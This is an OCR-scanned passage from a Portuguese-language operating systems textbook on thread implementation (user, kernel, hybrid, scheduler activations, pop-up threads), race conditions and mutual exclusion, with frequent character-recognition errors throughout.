ąueio). Sc a chamada read causar bloąueio, a cha mada nao 
sera leita. Em vez disso, um outro thread e executado. Da 
próxima vez que assumir o controle, o sistema de tempo 
de execuęao podera verilicar novameme se a chamada read 
e segura. Esse metodo requer que se reescrevam parłeś da 
biblioteca de chamadas de sistema, e inelidente e desele- 
ganię, mas ha poucas alternaiwas. O código quc envolve a 
chamada de sistema para fazer a verificaęao e chamado de 
jaąueta (jacket) ou wrapper. 

Algo a na logo ao problem a de bloąueio de chamadas 
de sistema e o problema de {page fauh) falta de pagina, 
Estudarcmos esses problemas no Capftulo 3. No memen¬ 
to, e suficiente dizer que os computadores po dem ser 
configu rados de tal modo quc nem todo program a fique 
simultancamcntc na memória prindpaL Sc o programa 
faz uma chamada ou um salto para uma instruęao quc 
nao esteja na memória, ocorre uma falta de pagina c o 
sistema operacional busea a instruęao (e seus vizinhos) 
no disco. Isso e chamado de falta de pagina. O processo 
fi ca bloąueado enąuanto a instruęao necessaria estiver 
sendo localizada e lida. Se um thread causa uma falta 
de pagina, o nu cleo — que nem ao men os sabe sobre a 
existćncia de threads — naturaImente bloqucia o pro¬ 
cesso intciro atć que a E/S dc disco terminc, mesmo quc 
outros threads possani ser executados. 

Outro problema com pacotes de threads de usuario e 
ąuc t sc urn thread comeęa □ executar, nenhum outro thread 
naąucle processo executara seąuer uma vez, a menos que o 
primcirothread, volumariamcntc, nbramao da CPU, Emum 
processo iiiiico nao ha interrupęoes dc relógio, o quc tonią 
impossfvel cscalonar processos pelo esąucma de escalona¬ 
mento drcular {round-rebin, que signilica dar a veza outro). 
A menos que um thread ceda volunlariamente a vez para 
outro, o escalonador nunca tera oportunidade de faze-Io. 

Uma soluęao possfvcl para o problema dc sc ter threads 
execulando indefinidamente e obrigaro sistema dc tempo 
de execuęao a reąnisitar um sina! de relógio (inierrupęao) 
a cada segundo para dar a ele o controle, mas isso tambem 
e algo grosseiro e confuso para pro gra mar. Interrupęoes 
de relógio periódicas em Frequencias mais alias nem sem- 
pre sao possfveis e, mesmo quc fossem, acarretariam uma 
grandę sobre cargo, Alem disso, um thread pode ainda pre- 
cisar dc uma imcnupęao dc relógio, interferindo cm seu 
uso do relógio pelo sistema dc tempo dc execuęao. 

Outro — e provave!mente mais devastador — argu- 
mento contra os threads dc usuario ć quc os progi arna- 
dores gera Imente q u erem threads em aplicaęoes nas quais 
des bloąuciam com frcąuenria, como, por exemplo, em 
um scrvidor Web multithread. Esses threads estao fazen- 
do constantes chamadas dc sistema. Uma vcz que tenha 
ocorrldo uma inierrupęao dc software (trap) para o nucleo 
a flm de executar a chamada dc sistema, nao seria muito 
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mais trabalhoso para o nudeo tambem trocar a thread ein 
execuęao. Com o nudeo fazendo estas trocas, nao ha ne- 
cessidade de fazcr constantes diamadas de sistema select, 
qtie vcrificam se as diamadas de sistema read sao scgu- 
ras. Para aplicaędes essendalmente limitadas pela CPU c 
quc raranieme bloąuciam, qual c o objctivo de sc usarem 
threads? Ninguem proporia seria menie ramp u tar os pri- 
mciros n numeros primos ou jogar xadrez usando threads, 
pois nao ha vamagem alguma nisso. 

2.2.51 Implementacja de threads no nucleo 

Comideremos agora que o nudeo saiba sobre os threads 
e os gerende. Nao e necessario um sistema dc tempo dc 
cxccuęao, eon formę most rad o na Figura 2*11(1)). Nao hi, 
tambem, tienhuma tabela dc threads cm cada processo* Em 
vez disso, o nudeo lem uma tabela de threadsqucacompa- 
nha todos os threads no sistema. Quando um thread quer 
eriar um novo thread ou destruir um ja existcnte, ele faz 
uma diamada ao nudeo, qne realiza en tao a criaęao ou 
a destruięao atualizando a tabela dc threads do nudeo. 

A tabela dc threads do nudeo rantem os rcglsiradores, 
o estado e outras informaęoes dc cada thread* As informa¬ 
ęoes sao as mesmas dos threads dc usuario, mas estao agora 
no nucleo, e nao no espaęo do usuario (no sistema de tem¬ 
po de execuqao). Essas informaęoes consiiiuem um subcon- 
junto das informaęoesque nudeos tradicionais mantem so- 
brc cada um de scus processos monoihrcads, istoe, o estado 
do pmcesso. Alem disso, o nucleo tambem mantem a tra- 
didonal tabela dc proce ssos para acompanhameiito desies, 

Todas as diamadas que possani bloąuear um thread 
sao implememadas como diamadas dc sistema, a urn custo 
ransideravel menie maior que urna diamada para uma ro¬ 
li na do sistema de tempo de cxecuęao. Quando um thread 
ć bloqueado, e opęao do nucleo executar mitro thread do 
mesmo processo (se algum cstiver pronto) ou um thread 
dc outro processo. Com os threads dc usuario, o sistema 
dc tempo de execuęaG mantem os tlireads dc sen próprio 
processo excculando ale que o nucleo retirc a CPU dęte 
(oti atć quc nao baja mais threads prontos para cxccular). 

Por causa do custo relatwamentc maior dc criar c destruir 
threads dc nucleo, alguns sistemas adotam urna a horda gem 
'ambientaimenie corrcta' c 'reddam' sens threads. Ao ser 
destnudo, um thread e marcado como nao exceutaveL mas 
suas estruturas dc dados no nucleo nao sao afetadas* Oepois, 
quando for preciso criar um novo thread, um thread anti- 
go sera reativado, economizando, assiin, alguma sobreearga. 
A reddagem de threads tambem e possfvel para tlireads de 
usuario, mas, como nesse caso a sobreea rga do gore ud a men- 
to do thread e muito menor, ha rnenos incentivo para isso. 

Os threads de nudeo nao precisam dc nenhuma cba- 
mada de sistema nao-bloqueante, Alem disso, se um thread 
em um processo causa uma fal ta de pagina, o nudeo pode 
facihneme verilicar se o processo tern threads para execuęao 
e, em caso a fi i mali vo, pode executa-los enquanto aguarda 


a pagina reąuisitada ser trazida do disco. A prindpal des- 
yantagem e que o custo de uma diamada de sistema e alto 
e, portanto, a ocorrenda frequente de opcracoes de thread 
(criaęao, temiino etc.) causara uma sobreearga muito maior, 

Embora os threads de nudeo resoh am alguns próbie- 
mas. eles nao resolvem todos. Por exemplo, o que acontece 
quando um processo muliithread e bifurcado? O novo pro¬ 
cesso tern tantos threads quanto o amerior ou tein apenas 
um? Em muitos casos, a meihor escolha depende do que 
o processo esta planejando fazer em seguida. Se cliamar 
exec para comeęar um novo programa, provavdmente ter 
apenas um thread e a escolha correta, mas sc continua a 
cxccutar, replicar todos os threads provavelmente ć a es¬ 
colha certa a fazer. 

Ouira q u es ta o sao os sinais* Lembremos que os sinais 
sao enviados para processos, liao para threads, pelo nienos 
no modelo dassira* Quando um sinal chega, quai thread 
dcveria controla-Io? Possivclmentc os threads podem re- 
gisuar sen interesse em certos sinais; assim, quando um 
sinal chegasse, ele seria dado ao thread que dissesse que 
o deseja. Mas o quc acontece se dois ou mais threads sc 
rcgislrarem para o mesmo sinal? Esses sao apenas dois dos 
problem as que os threads apresentam, mas ha outros, 


2.2.61 Implementaęóes hibridas 

Varios modos de tentai combinar as vantagens dos 
tlireads de usuario com os threads de nucleo tem sido inves- 
tigados* Um deles e usar threads de nudeo e, entao, nnilti- 
plexar threads de usuario sobre algum ou todos os threads 
de nucleo, como ilustra a Figura 2. 12. Quando essa aborda- 
gem e utilizada, o programadorpode deddirquantos threads 
de nudeo usar e quantos threads dc usuario niultip!cxar 
sobre cada um, Esse inodclo da o niaximo dc flcxibilidadc, 
Com essa abordagem, o nudeo sabe apenas sobre os 
threads de nucleo e escałona-os. Alguns desses threads 
podem ter multiplexado diversos threads de usuario. Es™ 
tes sao criados, destruidos e escalonados do mesmo modo 


Threads de mCiltiplos usuarios 
sobre um thread de nucleo 
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I Figura 2*12 Multplexando threads de usuarios sobre threads 
de nucleo. 
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que threads de usuario em um processo que executa em 
urn sistema operacional sem capacidade multithread. Nesse 
modelo, cada thread de nucleo possui algum eon junto de 
threads de usuario que aguarda sua vez para usa-Io. 

2-2.71 Ativaęoes do escalonador 

Ernbora threads dc nucleo sejam mdhores que threads 
dc usuario cm aspectos imporiantes, tambćm sao indiscuti- 
yelmcntc mais lentos. Como conscąuencia disso, os pcsqui- 
sadores tem proairado mci os dc aperfeięoamcnto sem de- 
sistir dc suas boas propriedades. A seguir, descrcveremos um 
desses metodos, deseńvolvido poi Anderson cl al (1 992), 
chama do ativaęoes do escalonador. Um trabalho scmc- 
Ihante ediscutido porEdleret al, (i 988) e Scott et al. (1990), 

As alivaę5es do escalonador servcrn para imitar a fim- 
cionalidade dos threads de nucleo — porem com melhor 
desempenho e maior flexibilidade —, em geral associa- 
dos aos pacotes de threads de usuario, Particularmente, 
os threads de usuario nao deveriam ter de fazer chamadas 
de sistema espcciais sem bloąueio o u verihcar aniccipa- 
damente se e seguro realizar certas chamadas de sistema. 
Com udo, ąuando um thread bloąueia em u ma cha mada de 
sistema ou em urna falta de pagina, seria posstvd executar 
outro thread dentro do mesmo processo se houvesse algum 
thread pronto, 

A eFiciencia e conseguida evitando-se transięoes des- 
necessarias entre o espaęo do usuario e o do nucleo. Por 
cxemplo, sc um thread bloąueia aguardando quc outro 
thread faęa algo, nao ha razao para envolver o nucleo, eco- 
nomizaiido assim a sobrecarga da transięao micleo-usua- 
rio. O sistema de tempo de execuqao no espaęo do usuario 
pode bloąuear o thread de sincronizaęao c dc mesmo es- 
caionar outro. 

Quando sao usadas ativaęocs do escalonador, o mi- 
deo atribui um ceno numero de processadorcs virtuais a 
cada processo e deixa o sistema de tempo de execuęao (no 
espaęo do usuario) alocar os threads aos processadorcs. 
Essc mecanismo tambćm pode ser usado cm um multi- 
processador no qual os processadorcs viiiuais podem ser 
CPUs reais. O numero dc processadorcs virtuais alocados 
para um processo inicialmeme e um, mas o processo pode 
pedir outros c tambćm liberar processadorcs de quc nao 
precisa mais. O nucleo pode lomar de voka processadorcs 
virmais ja alocados para alribuf-los, cm seguida, a outros 
processos mais exigente$, 

A ideia basica quc faz esse csąucma funcionar ć a se- 
guinter quando o nucleo sabe que um thread bloąueou 
(por exemplo, tendo executado uma chamada de sistema 
com bloąueio ou ocorrendo u ma faka de pagina), ele avi- 
sa o sistcina de tempo dc execuqao do processo, passando 
como parameiros na pilha o numero do thread em ąuestao 
e urna descrięao do evento ocorrido. A notifieaęno ocorrc 
ąuando o nucleo ativa o sistema de tempo de execuęao em 
um cudereęo inidal conhcddo, semdhante a um sinal no 
UNIK. Esse mecanismo e ehamado upcall. 


Urna vez ativado, o sistema de tempo de execuęao pode 
reescalonar seus threads, geralmentc marcando o thread atual 
como bloąueado e tomando outro da lista de prontos, confi- 
gurando seus registradores e rciniciando-o, Depois, ąuando o 
niidco dcscobrir ąuc o thread original pode cxecutar nova- 
menlc (por exemp)o, o pipc do qual cle estava tentando ler 
agora conteni dados, ou a pagina sobrc a qual ocorreu urna 
falta de pagina foi trazida do disco), o nucleo faz um outro 
upcall para o sistema de tempo de execuęao para informa-lo 
sobre esse evemo. O sistema tle tempo de execuęao, por conta 
propria, pode reinirializar o thread bloąueado i media ta me me 
o u colo ca-lo na lista de prontos para executar mais larde. 

Quando ocorrc urna interrupęao de hardware en- 
quamo um thread de usuario estiver execuiando, a CPU 
inlerrompida vai para o modo nucleo. Se a interrupęao for 
causada por um evento que nao e de interesse do processo 
interrompido — como a lin a lizano de urna E/S de outro 
processo —, ąuando o manipulador da interrupęao termi- 
na, ele colocara o thread interrompido de vo!ta no estado 
em que estava antes da interrupęao. Se, eon Lu do, o proces¬ 
so estiver interessado na interrupęao — como a chegada de 
u ma pagina esperada por um dos threads do processo —, 
o thread interrompido nao sera reinidado, Em vez disso, 
esse thread sera suspenso e o sistema de tempo de execuęao 
sera inlciado sobre a CPU virtual, com o estado do thread 
interrompido presente na pilha. Emao, fica a criterio dosis- 
tema de tempo de execuęao decidir qual thread escalonar 
sobie aąucla CPU: o interrompido, o mais rcccntcmcnte 
pronto ou alguma tcrccira altcrnativa. 

Urna objeęao as ativaęoes do escalonador e a confianęa 
fundamemai nos upcalls, um conceito que vio)a a estrutura 
inerente de ąualąucr sistema em camadas. Normalnie me, 
a camada n oferece certos servięos que a camada n + 1 pode 
cha mar, mas a camada n nao pode chama r rotinas da cama¬ 
da n + 1. Upcalls nao seguem esse princfpio basico. 

2.2-81 Threads pop~up 

Threads sao bastante titeis em sistemas distribufdos. 
Urn exemplo importante e como as mensagens que che- 
gam (por exempio, reąuisięoes de semęos) sao tratadas. A 
abordagem tradicional e bloątiear um processo ou thread 
em urna chamada de sistema receive e aguardar que urna 
mensa gem chegue, Quando a mensagem chega, da e acei- 
ta, seu conteudo ć examinado e e, en! a o, processada, 

Com u do, um caminho completa mente diferente tam- 
bem e possfveI, no ątial a chegada de urna mensagem faz 
com que o sistema crie um novo thread para Udar com 
a mensagem. Esse thread e ehamado thread pop-up e 
e ilustrado na Figura 2,13, Um ponto fundamemai dos 
threads pop-up ć que, como sao novos, nao tem qualquer 
historia — registradores, pilha etc, — que deva ser restau- 
radan Cada um dclcs inicia recćm-criado e ć identico a to- 
dos os outros, Esso possibilita que sejam criados rapidamen- 
te. Ao novo thread e dada a mensagem pora processar. A 
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Figura 2.13 Criaę^o de um novo thread quando chega uma mensagern, [a) Antoś da chegada da mensagern, |b} Após a chegada 
da mensagern. 


vantagcrn do uso de threads pop-up e que a la Lenda entre 
a chegada da mensagern e o infcio do processamento pode 
ser muito peąuena. 

Alguin planejamento previo e necessario ąuando sao 
usados threads pop-up. Por exemplo, em qual processo o 
thread executa? O thread pode ser exeairado no contexto 
do nudeo, se o sistema suponar (por isso qne nao mostra- 
mos o nudeo na Figara 2.13). Fazcr com que o thread pop- 
-up execute no espaęo do nudeo e em gerał mais facil e 
mais rapido do que podo no espaęo do usuario. Alem disso, 
nm thread pop-up de nudeo pode fadlmente ter acesso 
a lodas as tabdas c aos dispositivos dc E/S necessarios ao 
processamento de intcmipęóes, Por outro lada um ihre¬ 
ad de nudeo com erros pode causar mais da nos que um 
ihread de usuario com erros. Por exemplo, se a exeaięao 
demorar muito e nao liberar a CPU para outro thread, os 
dados que chegam poderao ser perdidos. 

2.2.91 Convertendo o código monothread 
em código multithread 

Muitos program as existemes foram escrkos para pro- 
cessos monothread. Converte-los para multithread e muito 
mais complicado do quc possa parcccr. A scguir, cstudarc- 
rnos apenas alguns dos probkmas implicados nessa larefa. 

Para comeęar, o código de um thread consiste norma I- 
mentc dc multiplas rotinas, como um processo. Essas roti- 
nas podem possuir variaveis locais, variayeis globais e para- 
metros. Variaveis locais e parametros nao cansam qualquer 
problema; mas, por outro lado, variaveis que sao globais a 
um thread mas nao sao globais ao programa inteiro sao um 
problema. Essas variaveis sao globais ąuando tnuitas roti- 
uas dentro do thread as utilizam (uma vez que des podem 


usar qualquer variavel global), mas outros threads deve- 
rta m deixa-las logicamente isoladas. 

Como um exemplo, considere a vańavd ermo mamida 
pelo UNIX. Quando um processo (ou um thread) faz uma 
cha mada de sistema que falha, o código de erro e colocado 
em ernw. Na Figura 2.14, o thread 1 executa a chamada de 
sistema acoess para sabei se tern permissao de acesso a um 
certo arquivo, O sistema opera ci onal retorna a resposta na 
variavel global ernw* Depois que o com role retorna para o 
thread i — mas antes que ele tenha opommidade de ler 
ernw —, o escalonador decide que o thread 1 ja teve tempo 
suficiente de CPU c chaveia para o thread 2. Estc exccuta 
uma chamada open que fal ha e que faz com que o conteudo 
de ermo seja sobreposto e o código de acesso do thread I se 
perca para sempre. Quando readąuire o eon trale, o thread 
I lera o valor errado e se comportara de maneira incorreta. 

Thread 1 Thread 2 

a * 

| Access (e rrno ai te rado) 


Open termo sobreposto) 



Errno e inspecionado 

I Figura 2J4 Contiitos entre threads sobre o uso de uma 
variśvel global. 
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Varias sohtęoes sao possfveis para esse problema. 
Urna delas e proibir o uso de variaveis globais. Contudo, 
por melhor que possa ser, essa opęao causara um confłito 
com imiiios softwares existentes. Outra soluęao e atribuir 
a cada thread suas próprias variavels globais privadas r eon- 
formę mostra a Figura 2.15; desse modo, cada llircad tem 
sua própria cópia privada de ermo alem de o u tras vanavds 
globais, de forma que os eon Hit os sao evimdos, Ncsse caso, 
essa decisao cria um novo nivd de escopo, variavds visf- 
veis para todas as rotinas de um thread, alem dos nfveis 
existentes de escopo de variaveis vistveis somente a Lima 
roiina e variaveis visfvels em qualquer łocal do próg rama. 

Ter accsso as variavcisglobais privadas ć, comudo, algo 
um tanto complexo, urna vcz que a maioria das linguagcns 
de programaęao possui um modo de expressar variaveis lo- 
cais e variavei$ globais, mas nao formas intermediarm Ć 
possfvel alocar um 'pedaęo' de memória para as globais e 
passa das para cada rodna no thread, como um para metro 
extra. Hmbora nao muito elegante, essa soluęao funciona. 

Dc outra maneira, novas rotinas dc bibliotcca po dcm 
ser fntroduzidas para criar, altcrar c ler essas variavcis glo¬ 
bais com abrangencia restrila ao thread, A primeira cha ma¬ 
da pode ser algo como: 

creato^global ( ll bulpt r"); 

Ela aloca memória para um pomei.ro cha mado hufptm o 
heapou em urna area de memória espedalrnenie reservada 
para o thread qtie emitiu a cha ma da. N T ao importa onde a 
memória esteja alocada; sonie me o th read que emitiu a cha- 
mada tem accsso a variavel globai. Se oulro thread cria urna 
variavel globai com o mesmo nomc, de obićm urna por- 
ęao diferente dc memória que nao conflita com a exisiente. 

Duas charnadas sao necessarias para obter accsso as 
variaveis globais: urna para escrever nelas e a outra para 
le-las. Para escrever nelas, algo como 

set_globalCbufptr'\ Sb uf); 



I Fi g u ra 2.1 5 Thread s podem ter variaveis globais i ndrviduai & 


vai funcionar. Ela armazena o valor de um pomeiro na loca- 
ęao de memória anterioimente criada pela cha mada creak_ 
globai Para ler urna variavel globai, a cha mada e algo como 

bufpir - read_global( cl bufptr”); 

Ela rei orna o endereęo armazenado na variave! globai; 
assim, seus dados podem ser accssados. 

O próximo problema — "comener um programu mono- 
thrwd para multithread" *—e que inuitas rotinas de bibliote- 
cas nao sao reentrames. Em outras palavras r as rotinas nao 
sao projetadas para que se possa la zer urna segunda cha¬ 
ma da a qualquer rotina cruptanlo u ma cha mada anten or 
ainda nao tenha terminado. Por cxemplo, o envio de urna 
men sagom sobie a rede pode set programado montando- 
-se a mcnsagein em um buffer localizado dctitro da biblio¬ 
tcca e, en la o, fazendo um trap (inlcrrupęao de software) 
para que o nucleo envie a mensa gem, O quc aconiece se 
um thread tiver moatado sua mensagem no buffer e, en- 
tao, urna inierrupęao de rdógio foręar um chavcamcnto 
para um segundo thread que imediatamente sobreponha 
o buffer com sua própria mensagem? 

Da mesma maneira, rotinas de alocaęao de memória, 
por exemplo, o malloc no UNIX r mantem tabelas muito im- 
ponamessobreo uso da memória — poratemplo, urna lista 
encadeada de poręoes disponfveis de memória. Enąuanto o 
malloc estiver ocupado atualizando essas listas, das podem 
estar temp ora riamente cm um estado inconsisienie, com 
ponteiros que nao apontam para lugar nenhum. Se ocorrer 
um cha v ca men to de threads enquanto as tabelas cstiverem 
inconsisientes e u tną nova cha mada chegar de um thread 
diferente, podera ser usado umponteiro hwalido, levandoo 
programa a u ma saida anormal. Consertar todos esses pro- 
blemas de urna maneira adeąuada c dicazsignifica reescre- 
vcr a bibliotcca inteira. Eazc-lo nao c urna atwidadc trivial. 

Urna soluęao diferente e fornecer a cada rotina urna 
proteęao que altera um bit para indicar que a biblioteca 
esia em uso. Qualquer tentativa de outro thread usar uma 
rotina da biblioteca — enquanto uma chamada anterior 
ainda nao tiver terminado — c bloqueada. Ernbora esse 
metodo possa Funcionar, dc elimina grandę parte do para- 
Iclismo potcncial. 

Em seguida, considere os sinais. Alguns sao logicamen¬ 
ie especificos de um thread; ja outros, nao. Por exemp!o, 
se um thread faz uma chamada alarm, tem sentido para o 
sinal resultante ir ao thread que fez a chamada. Contudo, 
quando threads sao implementados inteira nieme no espa- 
ęo do u sua ri o, o nucleo nem mesmo sabe sobre os threads 
c difkilmcnte poderia conduzir um sinal para o thread cor- 
reto. Uma outra complicaęao ocorre se um processo puder 
ter somente um alarmc pendente por vez c varios threads 
estiverem fazendo a chamada alarm independememente, 

Outros sinais, como a interrupęao do teclado, nao 
sao espccificos dc um thread. Quem devcria captura-los? 
Dcsigna-sc algom thread? Todos os threads? Um thread 
pop-up rcccntcmentc triado? Alćm disso, o que acontccc- 
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ria se urn thread mudasse os tratadores do sinal sem dizer 
nada aos outros threads? E se mn thread quisesse capturar 
uin sinal especffrco (por exemplo, ąuando o usuario digi- 
tasse CTRL-C) c outro thread reąuisiiasse esse sinal para 
ter mi nar o processo? U ma situaęao como essa pode sui gir 
ąuando um ou mais threads executam rotinas da biblio- 
teca-padrao enąuanto outros utUizam rotinas cscrilas pelo 
usuario. Esscs desejos sao claramenic incompativeis. Em 
gcral, sina i s sao sufidcntemenLe diffceis de gerendar em 
lim ambiente monothread. Converter para um ambiente 
mnltithread na o torna mais Facil a ta ref a de trata-los. 

Um ultimo problema iniroduzido por threads c o ge- 
rendamento da pillia. Em muitos sistemas, ąuando ocorre 
um iransbordo da pillia do processo, o mleko apenas gara Li¬ 
te ąue o processo tera automaticamente mais pillia. Quan- 
do possui muliiplos threads, um processo tambem deve ter 
multiplas pilbas. Se nao estiver cienie de todas essas pilhas, 
o nucleo nao podera faze-las crescer automaticamente 
por ocasiao da ocorrenda de urna "falta de pillia" (stack 
fauli). Na verdadc, de pode nem perceber que um erro 
na memória esta rdacionado com o crescimento da pilha, 

Esses problemas certa menie nao sao insuperaveis, mas 
mosiram ąue a mera introduęao de threads cm um sisicma 
existente nao vai .fund on ar sem um bom rep roje to. No mi- 
nimo, as scmanticas das chamadas dc sistema podem pre- 
cisar ser rcdefimdas e as bibliotecas, reescritas. E tudo isso 
tern de ser kito a firn de manier compatibilidade com pro- 
granias ja existentes para o caso limitante de um processo 
com apenas um ihread. Para informaęoes adicionais sobre 
threads, veja Hauser et ai (1993) e Marsh et al. (1991), 


2.3 


Comunicaęao entre processos 


Freąuemcmente processos predsamse comunicar com 
outros. Por exemplo, em umpipcline do interpreiadorde co- 
mandos, a salda do primeiro processo dcvc ser passa da para 
o segundo processo, e issoprossegue ate o firn da linha de co- 
mando. Assim, ha unia necessidade de comunicaęao entre 
processos que deveocorrer, dc prcferencia, de u ma maneira 
hem estruturada e sem intermpęoes. Nas próximas seęóes 
estudaremos alguns dos assuntos relacionados a comuni¬ 
caęao entre processos (interprocess communkation — IPC). 

Muito resumidamente, ha tres tópicos em rclaęao a isso 
quc dcvcm ser abordados. O primeiro e o comentado an- 
tmorincnte: como um processo passa hiformaęao para um 
outro. O segundo tliscuie como garantir que dois ou mais 
processos nao en trem em eon lilio, por exemplo, dois pro¬ 
cessos em um sistema de rescrva de linha aerca, ca da qual 
len land o conseguir o ultimo assento do aviao para clicntes 
diferentes, O terceiro esta rdacionado com urna seąuenda 
adeąuada ąuando cxisiirem dependcncias; se o processo A 
produz dados e o processo B os imprimc, B deve esperar ate 
quc A produza alguns dados a mes dc iniciar a impressao. 
Estudaremos esses ues tópicos a partir da próxima seęao. 


E importante mencionar tambem ąue dois desses topi- 
cos se aplicam igualmente bem aos threads. O primeiro— 
passar informacao — e fadl, ja que threads compartilham 
um espaęo de endereęamento comum (threads em espaęos 
de endereęamento diferentes e que predsam se comunicar 
sao assuntos da comunicaęao entre processos). Gontu do, 
os outros dois — manter um afastado do outro c a scąucn- 
da apropriada — aplicam-se igualmente bem aos threads* 
Para os mesmos problemas, as mesmas soluędes* A seguir, 
discuUremos isso no coruexio de processos, mas, por favor, 
tenha em menie que os mesmos problemas e solu ęoes nim¬ 
bem se aplicam aos threads. 

2.3.1 I Condkoes de corrida 

Em alguns sistemas opera clon a is, processos que iraba- 
Iham jirnios podem companilhar algum armazena men to 
comum, a partii do qual cada um seja capaz de kr c escre- 
ver. O armazenamenio compartilhado pode estar na me¬ 
mória prindpal (possivelmenle em urna estrumra de dados 
do nucleo) ou cm um arquivo compartilhado; o local da 
memória compartilhada nao a llera a namreza da comurii- 
caęao ou dos problemas quc surgem* Para entender como a 
comunicaęao entre processos fundóna na pralka, conside- 
rcmos um exemplo sirnples mas comąueiro: um spoci de 
impressao. Quando ąuer imprimir um arquivo, um pro¬ 
cesso entra com o nome do arquivo em um diretório de 
spool especiak Um outro processo, o daemon de impres- 
sao, verifica periodi ca menie se ha algum arquivo para ser 
impresso e, se houver, os impriinc e en tao remove seus 
nomes do diretório. 

Imaginc que nosso diretório de spool tenha um gran¬ 
dę u u mero de vagas, numeradas 0, L 2 ( cada urna 
ca pa z dc eon ter um nome de arquivo. Imagine tambem 
que haja duas variaveis compartithadas: salda, quc apon- 
ta para o próxirno arquivo a ser impresso, e en trąd a, qnc 
aponta para a próxima vaga no diretório. Essas duas va- 
riaveis podem muito bem ficar em um arquivo com duas 
palavras dispomvel a todos os processos. Em um dado 
memento, as vagas 0 a 3 estao vazlas (os arquivos ja fo- 
ram impressos) e as vagas 4 a 6 estao preendiidas (com os 
nomes dos arquivos na fila dc impressao), Mais ou menos 
simultancamente, os processos A e B deckiem quc querem 
colocar um arquivo na fila de impressao, Essa situaęao e 
ilusirada na Figura 2,16, 

Em casos cm que a lei de Murphy e aplicavcl (se algo 
puder dar errado, certamente dara), pode ocorrer o seguin- 
te: o processo A Ic in c armazena o valor, 7, na variavel 
local cha mada proxima_va$ajivre. Logo em seguida ocorre 
urna intermpęao do relógio ca CPU dccide que o processo 
A ja exccutou o su 11 cienie; eniao chaveia para o processo 
Estc tambem le entrada c obtem igualmente um 7. Ele, 
do mes ino modo, armazena o 7 em sua variavel local próxk 
Nesse insiante, ambos os processos pensam 
que a próxima vaga disponfveJ e a 7. 
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Diretório 



OUt = 4 


in = 7 


Figura 2.16 Dois processos querem acessar a menrrÓna 
I compartilhada ao mesmo tempo. 


O processo B prossegue sua execuęao. Ele armazena 
o nonie dc seu arquivo na vaga 7 e atualiza in como 8. A 
partir dtsso, ele lara ouiras colsas. 

Eveniualmeiue, o processo A cxecuta novameiue a 
partir de omie poro u. Verifica próxma_va$ajivre, encontra 
la urn 7 c cscreve scu norne de arquivo na vaga 7, apa- 
gando o nornc que o processo B acabou de por la. Ema o, 
cle caleula próxima_vagajivre + 1, que ć 8, c poe S cm in. 
O diretório dc spool esta agora imernameme consisietue; 
asshn, o daemon dc impressao nao notara nada de errado, 
mas o processo B nunca reccbera qualquer saida. 

O usLiario B fi cara etemamente defronte a sala da im- 
pressora, aguardando esperanęoso u ma saida que nunca 
vira. Siltiaęoes como essa — nas quais dois on mais pro¬ 
cessos estao lendo on cscrcvcndo algom dado compar- 
tiIliado c cujo rcsultado finał depende dc quem cxccuta 
prccisamcnte o quando — sao chamadas dc condięoes 
de corrida (race conditiom) . A depuraęao dc programas 
quc contenliam condięoes de corrida nao c nada diver- 
tida. Os rcsultados da maioria dos Eesies nao apresentam 
problemas, mas u ma hora, cm urn momento faro, algo 
estranho e mcxplicavel acontece, 

2.5.21 Regióes criticas 

O que fazer para evitar condięoes dc disputa? A respos- 
ta para evitar esse probiema, aqui e cni muitas ourrassitua- 
ęoes que envo!vam memória, arquivo$ ou qualquer outra 
coisa compartilliada, e encontrar algum modo de impedir 
que mais dc urn processo leia e escreva ao mesmo tempo 
na memória compartilhada. Em ouiras palavras, prerisa- 
mos dc exdusao mutua {Mutual exdu$wn), isto e, algmn 
modo de assegurar que ouiros processos sejam impedidos 
dc usar urna variavcl ou um arquivo compartilhado que 
ja esiiver cm uso por um processo. A dificuldadc anterior 
ocorreu porąue o processo B comeęou usando urna das va- 
riavcis compartilhadas ant es que o processo A terminasse 
dc usa-la, A cscolha das operaęócs primitivas adcquadas 
para rcalizar a cxclusao mutua ć um tmportantc tópico dc 


projeto de qualquer sisicma operacional e um assunto que 
estudaremos em dctalhes nas próximas seęoes. 

O probiernia dc evitar condięoes dc disputa tambem 
pode ser formulado de um modo abstrato, D u ranie u ma 
parte do tempo, um processo es ta ocupado fazendo com- 
putaęoes intemas e ouiras coisas que nao lcvam a condi¬ 
ęoes dc disputa. Contudo, alguinas vezes um processo pre- 
cisa ter acesso a memória ou a arquivos compartilhados ou 
tern de fazer outras coisas importantes que podcm ocasio- 
nar disputas. Aquela parte do programa em que ha acesso a 
memória compartilhada e chamada dc regiao critica (aiti- 
cal region) ou seęao critica {critica I section ). Sc pudessemos 
ajcitar as coisas de modo qtic nunca dois processos cstives- 
seru cm suas regióes criticas ao mesmo tempo, as disputas 
seriam evitadas, 

Embora essa soluęao impeęa as condięoes de disputa, 
isso nao e suficiente para que processos paralelos Coope¬ 
rem correta e cfidcmemcnte usando dados comparrilha- 
dos. Precisamos satisfazer quatro condięoes para chcgar a 
u ma boa soluęao: 

1. Dois processos nunca podcm estar simultaneamen- 
tc em suas regióes criticas, 

2. Nada pode ser afirmado sobre a veloddade ou sobre 
o mi mero de CPUs. 

3, Nenhum processo exccutando fora de sua regiao 
erfli ca pode bloąucar ouiros processos. 

4, Nenhum processo dcve esperar cierna menie para 
entrar cm sua regiao critica, 

Em u ni sentido abstrato, o comporta niemo que quere- 
mos e mostrado na Figura 2.17. Ali, o processo A entra em 
sua regiao critica no tempo T r Um poueo depois, no tempo 
T y o processo B lenta entrar em sua regiao critica, mas fa- 
Ilia porqtie oulro processo ja esta cm sua regiao critica, e 
c permitido que apenas um por vez o faęa. Conseąueme- 
mente, B fi ca temp ora ria me nie suspenso ale que, no tem¬ 
po T y A deixe sua regiao critica, permitindo que B eiitre 
imediatamenie. Por fmp £sai (em T 4 ) e voltamos a siluaęao 
original, sem processos em suas regióes criticas, 

2.5.3 I Exdusao mutua com espera ociosa 

Nesta seęao estudaremos varias alternativas para reali- 
zar exdusao mutua, de modo quc\ enąuanto um processo 
cstivcr ocupado atualizando a memória compartilhada cm 
sua regiao critica, nenhum oulro processo tausc problcmas 
invadindo-a, 

Desabilitando interrupęoes 

Em um sisicma de proccssador ii ni co, a soluęao mais 
simpleś c aquela em quc cada processo dcsabilila todas as 
iniernipęóes logo depois de enirar em sua regiao crflica e as 
reabiliu imediaiameme ames de sair dcla. Com as imetrup- 
ęoes dcsabililadas, nao pode ocorrer qua!quer imemipęao 
dc relógio. A CPU c chaveada de processo cm processo so- 
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Processo A 


i 

i 


A entra na regiao crftica 


j 

/ 


A deixa a regiao cntica 


Processo B 
